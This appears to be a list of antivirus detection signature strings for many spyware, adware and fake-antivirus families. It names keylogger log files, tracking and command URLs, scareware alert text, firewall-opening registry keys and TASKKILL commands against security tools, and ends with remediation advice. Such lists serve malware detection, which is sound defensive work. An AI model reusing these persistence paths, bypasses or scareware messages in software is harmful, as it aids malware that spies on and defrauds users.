- </HTML> (PEHSTR_EXT)
- NeoLite Executable File Compressor (PEHSTR_EXT)
- SOFTWARE\Spytech (PEHSTR)
- %s\sacache\skeys%d.log (PEHSTR)
- Spytech SpyAgent Keystroke (PEHSTR)
- %ssacache\skeys.log (PEHSTR)
- &Content-Type: text/html; name=logs.txt (PEHSTR)
- whieshm.dll (PEHSTR_EXT)
- whAgent.exe (PEHSTR_EXT)
- Software\webHancer (PEHSTR_EXT)
- whiehlpr.dll (PEHSTR_EXT)
- whiedc.STATIC (PEHSTR_EXT)
- whiedc.dll (PEHSTR_EXT)
- wbhshare.dll (PEHSTR_EXT)
- webhdll.dll (PEHSTR_EXT)
- regwebh.dll (PEHSTR_EXT)
- whAgentPageData (PEHSTR_EXT)
- programs\wbhshare.dll (PEHSTR_EXT)
- #!$[whAgent]$!# (PEHSTR_EXT)
- Software\webHancer\CC (PEHSTR_EXT)
- webHancer Customer Companion Information (PEHSTR_EXT)
- software\webhancer (PEHSTR_EXT)
- webHancer Survey Companion (PEHSTR_EXT)
- whSurvey.ini (PEHSTR_EXT)
- \Programs\whsurvey.exe (PEHSTR_EXT)
- \Programs\whagent.exe (PEHSTR_EXT)
- \Programs\webhdll.dll (PEHSTR_EXT)
- dUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 1.0.3705) (PEHSTR)
- 'action.php?p=%d&id=%s&system=%s&hwid=%s (PEHSTR)
- 4Serial key accepted. (PEHSTR)
- You must restart application. (PEHSTR)
- /protectyourpc-11.com/cgi-bin/cycle_report25.cgi (PEHSTR)
- 8Windows has found spy programs running on your computer! (PEHSTR)
- %Running of application is impossible. (PEHSTR)
- AWindows has detected malicious programs running on your computer. (PEHSTR)
- http://%s/r.php (PEHSTR)
- http://%s/sp.php?adv=%s&who=S (PEHSTR)
- (Please activate your antivirus software. (PEHSTR)
- dbsinit.exe (PEHSTR_EXT)
- paint.exe (PEHSTR_EXT)
- wab.exe (PEHSTR_EXT)
- ppp4.dat (PEHSTR_EXT)
- WinSta0\Default (PEHSTR_EXT)
- \Program Files (PEHSTR_EXT)
- \Internet Explorer (PEHSTR_EXT)
- \iexplore.exe (PEHSTR_EXT)
- stbup.exe (PEHSTR)
- %s\%s /preupdate (PEHSTR)
- SmileyHookAPIExe\ (PEHSTR_EXT)
- AxGifAnimator.DLL (PEHSTR_EXT)
- SmileyCore.dll (PEHSTR_EXT)
- LoadMyDll %s failed! (PEHSTR_EXT)
- HookAPINT.dll (PEHSTR_EXT)
- lsass.exe (PEHSTR_EXT)
- services.exe (PEHSTR_EXT)
- smss.exe (PEHSTR_EXT)
- general.useragent.extra (PEHSTR_EXT)
- CurrentVersion\Internet Settings\User Agent\Post Platform (PEHSTR_EXT)
- %s&p.pixelType=%s&hdsn=%s&m=%s&lo=%s&ii=%s (PEHSTR_EXT)
- p.pixelType=%s&a=%s&s=%s&p.price=%s&p.pixel=%s& (PEHSTR_EXT)
- .?AUIFunRedirector@@ (PEHSTR_EXT)
- .?AVCFunModule@@ (PEHSTR_EXT)
- \DoubleD (FOLDERNAME)
- key.dat (PEHSTR_EXT)
- screenshots.dat (PEHSTR_EXT)
- app.dat (PEHSTR_EXT)
- clipboard.dat (PEHSTR_EXT)
- prnt.dat (PEHSTR_EXT)
- Global\SettingsFileMap (PEHSTR_EXT)
- Global\InfoFileMapApp (PEHSTR_EXT)
- Global\InfoFIleMapSrv (PEHSTR_EXT)
- Global\ActActionUnInst (PEHSTR_EXT)
- Global\ActActionDrive (PEHSTR_EXT)
- \sysuser (FOLDERNAME)
- System\ControlSet001\Services\MSSystem (REGKEY)
- System\CurrentControlSet\Services\MSSystem (REGKEY)
- SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\\47658:TCP (REGKEY)
- SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\\47658:TCP (REGKEY)
- SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\%SYSTEM%\sysuser\system.exe (REGKEY)
- SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\%SYSTEM%\sysuser\system.exe (REGKEY)
- http://open/?url= (PEHSTR)
- its.not.ok (PEHSTR)
- Zbsrv.exe (PEHSTR)
- SBUSA.exe (PEHSTR)
- SADF.exe (PEHSTR)
- clientaxproxy.dll (PEHSTR)
- &comp_id= (PEHSTR)
- Software\Zango (PEHSTR)
- downloads.180solutions.com/ (PEHSTR)
- clickpotato.tv/ (PEHSTR)
- ClickPotatoLiteAX.Info (PEHSTR)
- could not connect to ads.aspx (PEHSTR)
- .popping a GAD ad - ad id (%s) keyword id (%s) (PEHSTR)
- %Downloads.180solutions.com/keywords/ (PEHSTR)
- nowhere.180solutions.com (PEHSTR)
- \\.\Scsi%d: (PEHSTR_EXT)
- pinballcorp.com/downloads (PEHSTR_EXT)
- SAHook.dll (PEHSTR_EXT)
- HOOK_DLL: AD process ID (0x%08X) equals (PEHSTR_EXT)
- HOOK_DLL: Hide Ad (PEHSTR_EXT)
- Computer safety (PEHSTR)
- 3is about to perform a full scan of your hard drive. (PEHSTR)
- \completescan_pal (PEHSTR)
- \sold_pal (PEHSTR)
- !ExecuteFile="m5vmi6n606vqx6x.exe" (PEHSTR)
- !ExecuteFile="3yo4wo7q1jn6257.exe" (PEHSTR)
- /writelog2.php?did= (PEHSTR)
- ^Security Essentials detected programs that may compromise your privacy or damage your computer (PEHSTR)
- filelocal:/?/%TEMP%\getkey.sys (PEHSTR)
- OThe firewall module blocks network attacks and other types of online intrusion. (PEHSTR)
- SPlease remove all malware and perform the "Cybercriminal activity test" once again. (PEHSTR)
- 0was forced to shut down due to security reasons. (PEHSTR)
- /activate.php (PEHSTR)
- httpPayform (PEHSTR_EXT)
- httpPayform1 (PEHSTR_EXT)
- <b>Recommended:</b><br>Please click "Remove All" button (PEHSTR_EXT)
- /zz.php? (PEHSTR_EXT)
- comfile (PEHSTR_EXT)
- %2.5f (PEHSTR_EXT)
- 'hidden' name='projectId' value='%d'/><input type='hidden' name='partnerId' (PEHSTR_EXT)
- .wgett.co.cc/ (PEHSTR_EXT)
- /SILENT (PEHSTR_EXT)
- .exe" /S (PEHSTR_EXT)
- #\OfferBox\config.xml (PEHSTR_EXT)
- /trackstats.php (PEHSTR_EXT)
- \OB.exe (PEHSTR_EXT)
- \count_total.txt (PEHSTR_EXT)
- http: (PEHSTR_EXT)
- .uz4.net/log34756.php (PEHSTR_EXT)
- GET /bad.php?w=%u&i=%s HTTP/1.0 (PEHSTR_EXT)
- stat.php?w=%u&i=%s&a=%u (PEHSTR_EXT)
- update.db (PEHSTR_EXT)
- new/1.exe (PEHSTR_EXT)
- User-Agent: Opera/6 (Windows NT %u.%u; U; LangID=%x; %s) (PEHSTR_EXT)
- Our_Agent (PEHSTR)
- \dxdiag.exe (PEHSTR)
- HSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders (PEHSTR)
- \Startup\dxdiag.exe (PEHSTR)
- Our_Agent (PEHSTR_EXT)
- \ctfmon (PEHSTR_EXT)
- AVGIDSAgent.exe (PEHSTR_EXT)
- AVGIDSMonitor.exe (PEHSTR_EXT)
- 360tray;avgnt;avgaurd;avcenter;adam;AgentSvr;AntiArp; (PEHSTR_EXT)
- %USERPROFILE%\Application Data\~ (PEHSTR_EXT)
- TASKKILL /F /IM NaverAgent.exe /T (PEHSTR_EXT)
- TASKKILL /F /IM nsvmon.npc /T (PEHSTR_EXT)
- \restart.bat (PEHSTR_EXT)
- <script src="http://google.ru/js (PEHSTR_EXT)
- User-Agent: Test Agent (PEHSTR_EXT)
- /file/upload.php (PEHSTR_EXT)
- default.cfg (PEHSTR_EXT)
- metrika.yandex.ru (PEHSTR_EXT)
- </script> (PEHSTR_EXT)
- [UDLL] (PEHSTR_EXT)
- [DLL] (PEHSTR_EXT)
- `Dell.Foundation.eDell.Common.dll (PEHSTR)
- Dell.Foundation.eDell.Common (PEHSTR)
- `Dell.Foundation.eDell.Configuration.dll (PEHSTR)
- Dell.Foundation.eDell.Configuration (PEHSTR)
- `Dell.Foundation.Agent.Plugins.eDell.dll (PEHSTR)
- Dell.Foundation.Agent.Plugins.eDell (PEHSTR)
- explorer.exe http://uninstall.mysafesavings.com (PEHSTR_EXT)
- Microsoft\WindowsLogger\winlogger.exe (PEHSTR_EXT)
- Software\MySafeSavings (PEHSTR_EXT)
- jsXjif (PEHSTR_EXT)
- jS3 (PEHSTR_EXT)
- jsYjaf (PEHSTR_EXT)
- network.proxy.type (PEHSTR_EXT)
- http=%s:%s (PEHSTR_EXT)
- User-Agent (PEHSTR_EXT)
- .?AVCFindingDiscountApp@@ (PEHSTR_EXT)
- \Microsoft\Savman\savman.exe (FILEPATH)
- \Microsoft\WindowsLogger\winlogger.exe (FILEPATH)
- \Microsoft\Windows\WindowsAccManager\smass.exe (FILEPATH)
- \Microsoft\Windows\WindowsAccManager\account.exe (FILEPATH)
- \Windows NT\Accessories\RuntimeManager\runtimemanager.exe (FILEPATH)
- (x86)\Windows NT\Accessories\RuntimeManager\runtimemanager.exe (FILEPATH)
- \MSSavings (FOLDERNAME)
- \SafeSavings (FOLDERNAME)
- (x86)\MSSavings (FOLDERNAME)
- \Windows Discount (FOLDERNAME)
- &N\_x (SNID)
- ^C(\F (SNID)
- /tlx/ (SNID)
- y/(";H (SNID)
- ,C\jn (SNID)
- 0/_"_s (SNID)
- )ed\.. (SNID)
- \gm[w: (SNID)
- HJS (SNID)
- P|R\3a (SNID)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)40a59422fa486c7ae214d6e816c2fd00bf4d75c081993a49c4bc22bb0165b7feImmediately isolate the endpoint from the network. Remove the associated files, services, and registry keys identified in the analysis. Block the command-and-control domains at the network firewall. Due to the nature of the trojan, re-imaging the system is strongly recommended to ensure complete remediation.